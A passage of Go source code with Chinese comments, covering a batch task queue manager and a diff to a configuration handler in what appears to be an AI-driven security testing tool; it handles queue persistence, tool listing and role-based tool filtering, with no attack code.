CreatedAt: queueRow.CreatedAt,
|
||||
CurrentIndex: queueRow.CurrentIndex,
|
||||
Tasks: make([]*BatchTask, 0, len(taskRows)),
|
||||
}
|
||||
|
||||
if queueRow.Title.Valid {
|
||||
queue.Title = queueRow.Title.String
|
||||
}
|
||||
if queueRow.Role.Valid {
|
||||
queue.Role = queueRow.Role.String
|
||||
}
|
||||
if queueRow.StartedAt.Valid {
|
||||
queue.StartedAt = &queueRow.StartedAt.Time
|
||||
}
|
||||
if queueRow.CompletedAt.Valid {
|
||||
queue.CompletedAt = &queueRow.CompletedAt.Time
|
||||
}
|
||||
|
||||
for _, taskRow := range taskRows {
|
||||
task := &BatchTask{
|
||||
ID: taskRow.ID,
|
||||
Message: taskRow.Message,
|
||||
Status: taskRow.Status,
|
||||
}
|
||||
if taskRow.ConversationID.Valid {
|
||||
task.ConversationID = taskRow.ConversationID.String
|
||||
}
|
||||
if taskRow.StartedAt.Valid {
|
||||
task.StartedAt = &taskRow.StartedAt.Time
|
||||
}
|
||||
if taskRow.CompletedAt.Valid {
|
||||
task.CompletedAt = &taskRow.CompletedAt.Time
|
||||
}
|
||||
if taskRow.Error.Valid {
|
||||
task.Error = taskRow.Error.String
|
||||
}
|
||||
if taskRow.Result.Valid {
|
||||
task.Result = taskRow.Result.String
|
||||
}
|
||||
queue.Tasks = append(queue.Tasks, task)
|
||||
}
|
||||
|
||||
return queue
|
||||
}
|
||||
|
||||
// GetAllQueues 获取所有队列
|
||||
func (m *BatchTaskManager) GetAllQueues() []*BatchTaskQueue {
|
||||
m.mu.RLock()
|
||||
result := make([]*BatchTaskQueue, 0, len(m.queues))
|
||||
for _, queue := range m.queues {
|
||||
result = append(result, queue)
|
||||
}
|
||||
m.mu.RUnlock()
|
||||
|
||||
// 如果数据库可用,确保所有数据库中的队列都已加载到内存
|
||||
if m.db != nil {
|
||||
dbQueues, err := m.db.GetAllBatchQueues()
|
||||
if err == nil {
|
||||
m.mu.Lock()
|
||||
for _, queueRow := range dbQueues {
|
||||
if _, exists := m.queues[queueRow.ID]; !exists {
|
||||
if queue := m.loadQueueFromDB(queueRow.ID); queue != nil {
|
||||
m.queues[queueRow.ID] = queue
|
||||
result = append(result, queue)
|
||||
}
|
||||
}
|
||||
}
|
||||
m.mu.Unlock()
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ListQueues 列出队列(支持筛选和分页)
|
||||
func (m *BatchTaskManager) ListQueues(limit, offset int, status, keyword string) ([]*BatchTaskQueue, int, error) {
|
||||
var queues []*BatchTaskQueue
|
||||
var total int
|
||||
|
||||
// 如果数据库可用,从数据库查询
|
||||
if m.db != nil {
|
||||
// 获取总数
|
||||
count, err := m.db.CountBatchQueues(status, keyword)
|
||||
if err != nil {
|
||||
return nil, 0, fmt.Errorf("统计队列总数失败: %w", err)
|
||||
}
|
||||
total = count
|
||||
|
||||
// 获取队列列表(只获取ID)
|
||||
queueRows, err := m.db.ListBatchQueues(limit, offset, status, keyword)
|
||||
if err != nil {
|
||||
return nil, 0, fmt.Errorf("查询队列列表失败: %w", err)
|
||||
}
|
||||
|
||||
// 加载完整的队列信息(从内存或数据库)
|
||||
m.mu.Lock()
|
||||
for _, queueRow := range queueRows {
|
||||
var queue *BatchTaskQueue
|
||||
// 先从内存查找
|
||||
if cached, exists := m.queues[queueRow.ID]; exists {
|
||||
queue = cached
|
||||
} else {
|
||||
// 从数据库加载
|
||||
queue = m.loadQueueFromDB(queueRow.ID)
|
||||
if queue != nil {
|
||||
m.queues[queueRow.ID] = queue
|
||||
}
|
||||
}
|
||||
if queue != nil {
|
||||
queues = append(queues, queue)
|
||||
}
|
||||
}
|
||||
m.mu.Unlock()
|
||||
} else {
|
||||
// 没有数据库,从内存中筛选和分页
|
||||
m.mu.RLock()
|
||||
allQueues := make([]*BatchTaskQueue, 0, len(m.queues))
|
||||
for _, queue := range m.queues {
|
||||
allQueues = append(allQueues, queue)
|
||||
}
|
||||
m.mu.RUnlock()
|
||||
|
||||
// 筛选
|
||||
filtered := make([]*BatchTaskQueue, 0)
|
||||
for _, queue := range allQueues {
|
||||
// 状态筛选
|
||||
if status != "" && status != "all" && queue.Status != status {
|
||||
continue
|
||||
}
|
||||
// 关键字搜索(搜索队列ID和标题)
|
||||
if keyword != "" {
|
||||
keywordLower := strings.ToLower(keyword)
|
||||
queueIDLower := strings.ToLower(queue.ID)
|
||||
queueTitleLower := strings.ToLower(queue.Title)
|
||||
if !strings.Contains(queueIDLower, keywordLower) && !strings.Contains(queueTitleLower, keywordLower) {
|
||||
// 也可以搜索创建时间
|
||||
createdAtStr := queue.CreatedAt.Format("2006-01-02 15:04:05")
|
||||
if !strings.Contains(createdAtStr, keyword) {
|
||||
continue
|
||||
}
|
||||
}
|
||||
}
|
||||
filtered = append(filtered, queue)
|
||||
}
|
||||
|
||||
// 按创建时间倒序排序
|
||||
sort.Slice(filtered, func(i, j int) bool {
|
||||
return filtered[i].CreatedAt.After(filtered[j].CreatedAt)
|
||||
})
|
||||
|
||||
total = len(filtered)
|
||||
|
||||
// 分页
|
||||
start := offset
|
||||
if start > len(filtered) {
|
||||
start = len(filtered)
|
||||
}
|
||||
end := start + limit
|
||||
if end > len(filtered) {
|
||||
end = len(filtered)
|
||||
}
|
||||
if start < len(filtered) {
|
||||
queues = filtered[start:end]
|
||||
}
|
||||
}
|
||||
|
||||
return queues, total, nil
|
||||
}
|
||||
|
||||
// LoadFromDB 从数据库加载所有队列
|
||||
func (m *BatchTaskManager) LoadFromDB() error {
|
||||
if m.db == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
queueRows, err := m.db.GetAllBatchQueues()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
for _, queueRow := range queueRows {
|
||||
if _, exists := m.queues[queueRow.ID]; exists {
|
||||
continue // 已存在,跳过
|
||||
}
|
||||
|
||||
taskRows, err := m.db.GetBatchTasks(queueRow.ID)
|
||||
if err != nil {
|
||||
continue // 跳过加载失败的任务
|
||||
}
|
||||
|
||||
queue := &BatchTaskQueue{
|
||||
ID: queueRow.ID,
|
||||
Status: queueRow.Status,
|
||||
CreatedAt: queueRow.CreatedAt,
|
||||
CurrentIndex: queueRow.CurrentIndex,
|
||||
Tasks: make([]*BatchTask, 0, len(taskRows)),
|
||||
}
|
||||
|
||||
if queueRow.Title.Valid {
|
||||
queue.Title = queueRow.Title.String
|
||||
}
|
||||
if queueRow.Role.Valid {
|
||||
queue.Role = queueRow.Role.String
|
||||
}
|
||||
if queueRow.StartedAt.Valid {
|
||||
queue.StartedAt = &queueRow.StartedAt.Time
|
||||
}
|
||||
if queueRow.CompletedAt.Valid {
|
||||
queue.CompletedAt = &queueRow.CompletedAt.Time
|
||||
}
|
||||
|
||||
for _, taskRow := range taskRows {
|
||||
task := &BatchTask{
|
||||
ID: taskRow.ID,
|
||||
Message: taskRow.Message,
|
||||
Status: taskRow.Status,
|
||||
}
|
||||
if taskRow.ConversationID.Valid {
|
||||
task.ConversationID = taskRow.ConversationID.String
|
||||
}
|
||||
if taskRow.StartedAt.Valid {
|
||||
task.StartedAt = &taskRow.StartedAt.Time
|
||||
}
|
||||
if taskRow.CompletedAt.Valid {
|
||||
task.CompletedAt = &taskRow.CompletedAt.Time
|
||||
}
|
||||
if taskRow.Error.Valid {
|
||||
task.Error = taskRow.Error.String
|
||||
}
|
||||
if taskRow.Result.Valid {
|
||||
task.Result = taskRow.Result.String
|
||||
}
|
||||
queue.Tasks = append(queue.Tasks, task)
|
||||
}
|
||||
|
||||
m.queues[queueRow.ID] = queue
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// UpdateTaskStatus 更新任务状态
|
||||
func (m *BatchTaskManager) UpdateTaskStatus(queueID, taskID, status string, result, errorMsg string) {
|
||||
m.UpdateTaskStatusWithConversationID(queueID, taskID, status, result, errorMsg, "")
|
||||
}
|
||||
|
||||
// UpdateTaskStatusWithConversationID 更新任务状态(包含conversationId)
|
||||
func (m *BatchTaskManager) UpdateTaskStatusWithConversationID(queueID, taskID, status string, result, errorMsg, conversationID string) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
return
|
||||
}
|
||||
|
||||
for _, task := range queue.Tasks {
|
||||
if task.ID == taskID {
|
||||
task.Status = status
|
||||
if result != "" {
|
||||
task.Result = result
|
||||
}
|
||||
if errorMsg != "" {
|
||||
task.Error = errorMsg
|
||||
}
|
||||
if conversationID != "" {
|
||||
task.ConversationID = conversationID
|
||||
}
|
||||
now := time.Now()
|
||||
if status == "running" && task.StartedAt == nil {
|
||||
task.StartedAt = &now
|
||||
}
|
||||
if status == "completed" || status == "failed" || status == "cancelled" {
|
||||
task.CompletedAt = &now
|
||||
}
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// 同步到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.UpdateBatchTaskStatus(queueID, taskID, status, conversationID, result, errorMsg); err != nil {
|
||||
// 记录错误但继续(使用内存缓存)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// UpdateQueueStatus 更新队列状态
|
||||
func (m *BatchTaskManager) UpdateQueueStatus(queueID, status string) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
return
|
||||
}
|
||||
|
||||
queue.Status = status
|
||||
now := time.Now()
|
||||
if status == "running" && queue.StartedAt == nil {
|
||||
queue.StartedAt = &now
|
||||
}
|
||||
if status == "completed" || status == "cancelled" {
|
||||
queue.CompletedAt = &now
|
||||
}
|
||||
|
||||
// 同步到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.UpdateBatchQueueStatus(queueID, status); err != nil {
|
||||
// 记录错误但继续(使用内存缓存)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// UpdateTaskMessage 更新任务消息(仅限待执行状态)
|
||||
func (m *BatchTaskManager) UpdateTaskMessage(queueID, taskID, message string) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
return fmt.Errorf("队列不存在")
|
||||
}
|
||||
|
||||
// 检查队列状态,只有待执行状态的队列才能编辑任务
|
||||
if queue.Status != "pending" {
|
||||
return fmt.Errorf("只有待执行状态的队列才能编辑任务")
|
||||
}
|
||||
|
||||
// 查找并更新任务
|
||||
for _, task := range queue.Tasks {
|
||||
if task.ID == taskID {
|
||||
// 只有待执行状态的任务才能编辑
|
||||
if task.Status != "pending" {
|
||||
return fmt.Errorf("只有待执行状态的任务才能编辑")
|
||||
}
|
||||
task.Message = message
|
||||
|
||||
// 同步到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.UpdateBatchTaskMessage(queueID, taskID, message); err != nil {
|
||||
return fmt.Errorf("更新任务消息失败: %w", err)
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
return fmt.Errorf("任务不存在")
|
||||
}
|
||||
|
||||
// AddTaskToQueue 添加任务到队列(仅限待执行状态)
|
||||
func (m *BatchTaskManager) AddTaskToQueue(queueID, message string) (*BatchTask, error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
return nil, fmt.Errorf("队列不存在")
|
||||
}
|
||||
|
||||
// 检查队列状态,只有待执行状态的队列才能添加任务
|
||||
if queue.Status != "pending" {
|
||||
return nil, fmt.Errorf("只有待执行状态的队列才能添加任务")
|
||||
}
|
||||
|
||||
if message == "" {
|
||||
return nil, fmt.Errorf("任务消息不能为空")
|
||||
}
|
||||
|
||||
// 生成任务ID
|
||||
taskID := generateShortID()
|
||||
task := &BatchTask{
|
||||
ID: taskID,
|
||||
Message: message,
|
||||
Status: "pending",
|
||||
}
|
||||
|
||||
// 添加到内存队列
|
||||
queue.Tasks = append(queue.Tasks, task)
|
||||
|
||||
// 同步到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.AddBatchTask(queueID, taskID, message); err != nil {
|
||||
// 如果数据库保存失败,从内存中移除
|
||||
queue.Tasks = queue.Tasks[:len(queue.Tasks)-1]
|
||||
return nil, fmt.Errorf("添加任务失败: %w", err)
|
||||
}
|
||||
}
|
||||
|
||||
return task, nil
|
||||
}
|
||||
|
||||
// DeleteTask 删除任务(仅限待执行状态)
|
||||
func (m *BatchTaskManager) DeleteTask(queueID, taskID string) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
return fmt.Errorf("队列不存在")
|
||||
}
|
||||
|
||||
// 检查队列状态,只有待执行状态的队列才能删除任务
|
||||
if queue.Status != "pending" {
|
||||
return fmt.Errorf("只有待执行状态的队列才能删除任务")
|
||||
}
|
||||
|
||||
// 查找并删除任务
|
||||
taskIndex := -1
|
||||
for i, task := range queue.Tasks {
|
||||
if task.ID == taskID {
|
||||
// 只有待执行状态的任务才能删除
|
||||
if task.Status != "pending" {
|
||||
return fmt.Errorf("只有待执行状态的任务才能删除")
|
||||
}
|
||||
taskIndex = i
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
if taskIndex == -1 {
|
||||
return fmt.Errorf("任务不存在")
|
||||
}
|
||||
|
||||
// 从内存队列中删除
|
||||
queue.Tasks = append(queue.Tasks[:taskIndex], queue.Tasks[taskIndex+1:]...)
|
||||
|
||||
// 同步到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.DeleteBatchTask(queueID, taskID); err != nil {
|
||||
// 如果数据库删除失败,恢复内存中的任务
|
||||
// 这里需要重新插入,但为了简化,我们只记录错误
|
||||
return fmt.Errorf("删除任务失败: %w", err)
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetNextTask 获取下一个待执行的任务
|
||||
func (m *BatchTaskManager) GetNextTask(queueID string) (*BatchTask, bool) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
return nil, false
|
||||
}
|
||||
|
||||
for i := queue.CurrentIndex; i < len(queue.Tasks); i++ {
|
||||
task := queue.Tasks[i]
|
||||
if task.Status == "pending" {
|
||||
queue.CurrentIndex = i
|
||||
return task, true
|
||||
}
|
||||
}
|
||||
|
||||
return nil, false
|
||||
}
|
||||
|
||||
// MoveToNextTask 移动到下一个任务
|
||||
func (m *BatchTaskManager) MoveToNextTask(queueID string) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
return
|
||||
}
|
||||
|
||||
queue.CurrentIndex++
|
||||
|
||||
// 同步到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.UpdateBatchQueueCurrentIndex(queueID, queue.CurrentIndex); err != nil {
|
||||
// 记录错误但继续(使用内存缓存)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// SetTaskCancel 设置当前任务的取消函数
|
||||
func (m *BatchTaskManager) SetTaskCancel(queueID string, cancel context.CancelFunc) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
if cancel != nil {
|
||||
m.taskCancels[queueID] = cancel
|
||||
} else {
|
||||
delete(m.taskCancels, queueID)
|
||||
}
|
||||
}
|
||||
|
||||
// PauseQueue 暂停队列
|
||||
func (m *BatchTaskManager) PauseQueue(queueID string) bool {
|
||||
m.mu.Lock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
m.mu.Unlock()
|
||||
return false
|
||||
}
|
||||
|
||||
if queue.Status != "running" {
|
||||
m.mu.Unlock()
|
||||
return false
|
||||
}
|
||||
|
||||
queue.Status = "paused"
|
||||
|
||||
// 取消当前正在执行的任务(通过取消context)
|
||||
if cancel, exists := m.taskCancels[queueID]; exists {
|
||||
cancel()
|
||||
delete(m.taskCancels, queueID)
|
||||
}
|
||||
|
||||
m.mu.Unlock()
|
||||
|
||||
// 同步队列状态到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.UpdateBatchQueueStatus(queueID, "paused"); err != nil {
|
||||
// 记录错误但继续(使用内存缓存)
|
||||
}
|
||||
}
|
||||
|
||||
return true
|
||||
}
|
||||
|
||||
// CancelQueue 取消队列(保留此方法以保持向后兼容,但建议使用PauseQueue)
|
||||
func (m *BatchTaskManager) CancelQueue(queueID string) bool {
|
||||
m.mu.Lock()
|
||||
|
||||
queue, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
m.mu.Unlock()
|
||||
return false
|
||||
}
|
||||
|
||||
if queue.Status == "completed" || queue.Status == "cancelled" {
|
||||
m.mu.Unlock()
|
||||
return false
|
||||
}
|
||||
|
||||
queue.Status = "cancelled"
|
||||
now := time.Now()
|
||||
queue.CompletedAt = &now
|
||||
|
||||
// 取消所有待执行的任务
|
||||
for _, task := range queue.Tasks {
|
||||
if task.Status == "pending" {
|
||||
task.Status = "cancelled"
|
||||
task.CompletedAt = &now
|
||||
// 同步到数据库
|
||||
if m.db != nil {
|
||||
m.db.UpdateBatchTaskStatus(queueID, task.ID, "cancelled", "", "", "")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 取消当前正在执行的任务
|
||||
if cancel, exists := m.taskCancels[queueID]; exists {
|
||||
cancel()
|
||||
delete(m.taskCancels, queueID)
|
||||
}
|
||||
|
||||
m.mu.Unlock()
|
||||
|
||||
// 同步队列状态到数据库
|
||||
if m.db != nil {
|
||||
if err := m.db.UpdateBatchQueueStatus(queueID, "cancelled"); err != nil {
|
||||
// 记录错误但继续(使用内存缓存)
|
||||
}
|
||||
}
|
||||
|
||||
return true
|
||||
}
|
||||
|
||||
// DeleteQueue 删除队列
|
||||
func (m *BatchTaskManager) DeleteQueue(queueID string) bool {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
_, exists := m.queues[queueID]
|
||||
if !exists {
|
||||
return false
|
||||
}
|
||||
|
||||
// 清理取消函数
|
||||
delete(m.taskCancels, queueID)
|
||||
|
||||
// 从数据库删除
|
||||
if m.db != nil {
|
||||
if err := m.db.DeleteBatchQueue(queueID); err != nil {
|
||||
// 记录错误但继续(使用内存缓存)
|
||||
}
|
||||
}
|
||||
|
||||
delete(m.queues, queueID)
|
||||
return true
|
||||
}
|
||||
|
||||
// generateShortID 生成短ID
|
||||
func generateShortID() string {
|
||||
b := make([]byte, 4)
|
||||
rand.Read(b)
|
||||
return time.Now().Format("150405") + "-" + hex.EncodeToString(b)
|
||||
}
|
||||
@@ -28,6 +28,9 @@ type KnowledgeToolRegistrar func() error
|
||||
// VulnerabilityToolRegistrar 漏洞工具注册器接口
|
||||
type VulnerabilityToolRegistrar func() error
|
||||
|
||||
// SkillsToolRegistrar Skills工具注册器接口
|
||||
type SkillsToolRegistrar func() error
|
||||
|
||||
// RetrieverUpdater 检索器更新接口
|
||||
type RetrieverUpdater interface {
|
||||
UpdateConfig(config *knowledge.RetrievalConfig)
|
||||
@@ -47,16 +50,18 @@ type ConfigHandler struct {
|
||||
config *config.Config
|
||||
mcpServer *mcp.Server
|
||||
executor *security.Executor
|
||||
agent AgentUpdater // Agent接口,用于更新Agent配置
|
||||
attackChainHandler AttackChainUpdater // 攻击链处理器接口,用于更新配置
|
||||
agent AgentUpdater // Agent接口,用于更新Agent配置
|
||||
attackChainHandler AttackChainUpdater // 攻击链处理器接口,用于更新配置
|
||||
externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器
|
||||
knowledgeToolRegistrar KnowledgeToolRegistrar // 知识库工具注册器(可选)
|
||||
knowledgeToolRegistrar KnowledgeToolRegistrar // 知识库工具注册器(可选)
|
||||
vulnerabilityToolRegistrar VulnerabilityToolRegistrar // 漏洞工具注册器(可选)
|
||||
retrieverUpdater RetrieverUpdater // 检索器更新器(可选)
|
||||
knowledgeInitializer KnowledgeInitializer // 知识库初始化器(可选)
|
||||
appUpdater AppUpdater // App更新器(可选)
|
||||
skillsToolRegistrar SkillsToolRegistrar // Skills工具注册器(可选)
|
||||
retrieverUpdater RetrieverUpdater // 检索器更新器(可选)
|
||||
knowledgeInitializer KnowledgeInitializer // 知识库初始化器(可选)
|
||||
appUpdater AppUpdater // App更新器(可选)
|
||||
logger *zap.Logger
|
||||
mu sync.RWMutex
|
||||
lastEmbeddingConfig *config.EmbeddingConfig // 上一次的嵌入模型配置(用于检测变更)
|
||||
}
|
||||
|
||||
// AttackChainUpdater 攻击链处理器更新接口
|
||||
@@ -72,15 +77,26 @@ type AgentUpdater interface {
|
||||
|
||||
// NewConfigHandler 创建新的配置处理器
|
||||
func NewConfigHandler(configPath string, cfg *config.Config, mcpServer *mcp.Server, executor *security.Executor, agent AgentUpdater, attackChainHandler AttackChainUpdater, externalMCPMgr *mcp.ExternalMCPManager, logger *zap.Logger) *ConfigHandler {
|
||||
// 保存初始的嵌入模型配置(如果知识库已启用)
|
||||
var lastEmbeddingConfig *config.EmbeddingConfig
|
||||
if cfg.Knowledge.Enabled {
|
||||
lastEmbeddingConfig = &config.EmbeddingConfig{
|
||||
Provider: cfg.Knowledge.Embedding.Provider,
|
||||
Model: cfg.Knowledge.Embedding.Model,
|
||||
BaseURL: cfg.Knowledge.Embedding.BaseURL,
|
||||
APIKey: cfg.Knowledge.Embedding.APIKey,
|
||||
}
|
||||
}
|
||||
return &ConfigHandler{
|
||||
configPath: configPath,
|
||||
config: cfg,
|
||||
mcpServer: mcpServer,
|
||||
executor: executor,
|
||||
agent: agent,
|
||||
attackChainHandler: attackChainHandler,
|
||||
externalMCPMgr: externalMCPMgr,
|
||||
logger: logger,
|
||||
configPath: configPath,
|
||||
config: cfg,
|
||||
mcpServer: mcpServer,
|
||||
executor: executor,
|
||||
agent: agent,
|
||||
attackChainHandler: attackChainHandler,
|
||||
externalMCPMgr: externalMCPMgr,
|
||||
logger: logger,
|
||||
lastEmbeddingConfig: lastEmbeddingConfig,
|
||||
}
|
||||
}
|
||||
|
||||
@@ -98,6 +114,13 @@ func (h *ConfigHandler) SetVulnerabilityToolRegistrar(registrar VulnerabilityToo
|
||||
h.vulnerabilityToolRegistrar = registrar
|
||||
}
|
||||
|
||||
// SetSkillsToolRegistrar 设置Skills工具注册器
|
||||
func (h *ConfigHandler) SetSkillsToolRegistrar(registrar SkillsToolRegistrar) {
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
h.skillsToolRegistrar = registrar
|
||||
}
|
||||
|
||||
// SetRetrieverUpdater 设置检索器更新器
|
||||
func (h *ConfigHandler) SetRetrieverUpdater(updater RetrieverUpdater) {
|
||||
h.mu.Lock()
|
||||
@@ -122,6 +145,7 @@ func (h *ConfigHandler) SetAppUpdater(updater AppUpdater) {
|
||||
// GetConfigResponse 获取配置响应
|
||||
type GetConfigResponse struct {
|
||||
OpenAI config.OpenAIConfig `json:"openai"`
|
||||
FOFA config.FofaConfig `json:"fofa"`
|
||||
MCP config.MCPConfig `json:"mcp"`
|
||||
Tools []ToolConfigInfo `json:"tools"`
|
||||
Agent config.AgentConfig `json:"agent"`
|
||||
@@ -135,6 +159,7 @@ type ToolConfigInfo struct {
|
||||
Enabled bool `json:"enabled"`
|
||||
IsExternal bool `json:"is_external,omitempty"` // 是否为外部MCP工具
|
||||
ExternalMCP string `json:"external_mcp,omitempty"` // 外部MCP名称(如果是外部工具)
|
||||
RoleEnabled *bool `json:"role_enabled,omitempty"` // 该工具在当前角色中是否启用(nil表示未指定角色或使用所有工具)
|
||||
}
|
||||
|
||||
// GetConfig 获取当前配置
|
||||
@@ -150,18 +175,10 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
|
||||
configToolMap[tool.Name] = true
|
||||
tools = append(tools, ToolConfigInfo{
|
||||
Name: tool.Name,
|
||||
Description: tool.ShortDescription,
|
||||
Description: h.pickToolDescription(tool.ShortDescription, tool.Description),
|
||||
Enabled: tool.Enabled,
|
||||
IsExternal: false,
|
||||
})
|
||||
// 如果没有简短描述,使用详细描述的前100个字符
|
||||
if tools[len(tools)-1].Description == "" {
|
||||
desc := tool.Description
|
||||
if len(desc) > 100 {
|
||||
desc = desc[:100] + "..."
|
||||
}
|
||||
tools[len(tools)-1].Description = desc
|
||||
}
|
||||
}
|
||||
|
||||
// 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具)
|
||||
@@ -177,8 +194,8 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
|
||||
if description == "" {
|
||||
description = mcpTool.Description
|
||||
}
|
||||
if len(description) > 100 {
|
||||
description = description[:100] + "..."
|
||||
if len(description) > 10000 {
|
||||
description = description[:10000] + "..."
|
||||
}
|
||||
tools = append(tools, ToolConfigInfo{
|
||||
Name: mcpTool.Name,
|
||||
@@ -191,65 +208,16 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
|
||||
|
||||
// 获取外部MCP工具
|
||||
if h.externalMCPMgr != nil {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
|
||||
defer cancel()
|
||||
|
||||
externalTools, err := h.externalMCPMgr.GetAllTools(ctx)
|
||||
if err == nil {
|
||||
externalMCPConfigs := h.externalMCPMgr.GetConfigs()
|
||||
for _, externalTool := range externalTools {
|
||||
var mcpName, actualToolName string
|
||||
if idx := strings.Index(externalTool.Name, "::"); idx > 0 {
|
||||
mcpName = externalTool.Name[:idx]
|
||||
actualToolName = externalTool.Name[idx+2:]
|
||||
} else {
|
||||
continue
|
||||
}
|
||||
|
||||
enabled := false
|
||||
if cfg, exists := externalMCPConfigs[mcpName]; exists {
|
||||
// 首先检查外部MCP是否启用
|
||||
if !cfg.ExternalMCPEnable && !(cfg.Enabled && !cfg.Disabled) {
|
||||
enabled = false // MCP未启用,所有工具都禁用
|
||||
} else {
|
||||
// MCP已启用,检查单个工具的启用状态
|
||||
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容)
|
||||
if cfg.ToolEnabled == nil {
|
||||
enabled = true // 未设置工具状态,默认为启用
|
||||
} else if toolEnabled, exists := cfg.ToolEnabled[actualToolName]; exists {
|
||||
enabled = toolEnabled // 使用配置的工具状态
|
||||
} else {
|
||||
enabled = true // 工具未在配置中,默认为启用
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
client, exists := h.externalMCPMgr.GetClient(mcpName)
|
||||
if !exists || !client.IsConnected() {
|
||||
enabled = false
|
||||
}
|
||||
|
||||
description := externalTool.ShortDescription
|
||||
if description == "" {
|
||||
description = externalTool.Description
|
||||
}
|
||||
if len(description) > 100 {
|
||||
description = description[:100] + "..."
|
||||
}
|
||||
|
||||
tools = append(tools, ToolConfigInfo{
|
||||
Name: actualToolName,
|
||||
Description: description,
|
||||
Enabled: enabled,
|
||||
IsExternal: true,
|
||||
ExternalMCP: mcpName,
|
||||
})
|
||||
}
|
||||
ctx := context.Background()
|
||||
externalTools := h.getExternalMCPTools(ctx)
|
||||
for _, toolInfo := range externalTools {
|
||||
tools = append(tools, toolInfo)
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, GetConfigResponse{
|
||||
OpenAI: h.config.OpenAI,
|
||||
FOFA: h.config.FOFA,
|
||||
MCP: h.config.MCP,
|
||||
Tools: tools,
|
||||
Agent: h.config.Agent,
|
||||
@@ -259,11 +227,12 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
|
||||
|
||||
// GetToolsResponse 获取工具列表响应(分页)
|
||||
type GetToolsResponse struct {
|
||||
Tools []ToolConfigInfo `json:"tools"`
|
||||
Total int `json:"total"`
|
||||
Page int `json:"page"`
|
||||
PageSize int `json:"page_size"`
|
||||
TotalPages int `json:"total_pages"`
|
||||
Tools []ToolConfigInfo `json:"tools"`
|
||||
Total int `json:"total"`
|
||||
TotalEnabled int `json:"total_enabled"` // 已启用的工具总数
|
||||
Page int `json:"page"`
|
||||
PageSize int `json:"page_size"`
|
||||
TotalPages int `json:"total_pages"`
|
||||
}
|
||||
|
||||
// GetTools 获取工具列表(支持分页和搜索)
|
||||
@@ -292,6 +261,23 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
||||
searchTermLower = strings.ToLower(searchTerm)
|
||||
}
|
||||
|
||||
// 解析角色参数,用于过滤工具并标注启用状态
|
||||
roleName := c.Query("role")
|
||||
var roleToolsSet map[string]bool // 角色配置的工具集合
|
||||
var roleUsesAllTools bool = true // 角色是否使用所有工具(默认角色)
|
||||
if roleName != "" && roleName != "默认" && h.config.Roles != nil {
|
||||
if role, exists := h.config.Roles[roleName]; exists && role.Enabled {
|
||||
if len(role.Tools) > 0 {
|
||||
// 角色配置了工具列表,只使用这些工具
|
||||
roleToolsSet = make(map[string]bool)
|
||||
for _, toolKey := range role.Tools {
|
||||
roleToolsSet[toolKey] = true
|
||||
}
|
||||
roleUsesAllTools = false
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 获取所有内部工具并应用搜索过滤
|
||||
configToolMap := make(map[string]bool)
|
||||
allTools := make([]ToolConfigInfo, 0, len(h.config.Security.Tools))
|
||||
@@ -299,17 +285,34 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
||||
configToolMap[tool.Name] = true
|
||||
toolInfo := ToolConfigInfo{
|
||||
Name: tool.Name,
|
||||
Description: tool.ShortDescription,
|
||||
Description: h.pickToolDescription(tool.ShortDescription, tool.Description),
|
||||
Enabled: tool.Enabled,
|
||||
IsExternal: false,
|
||||
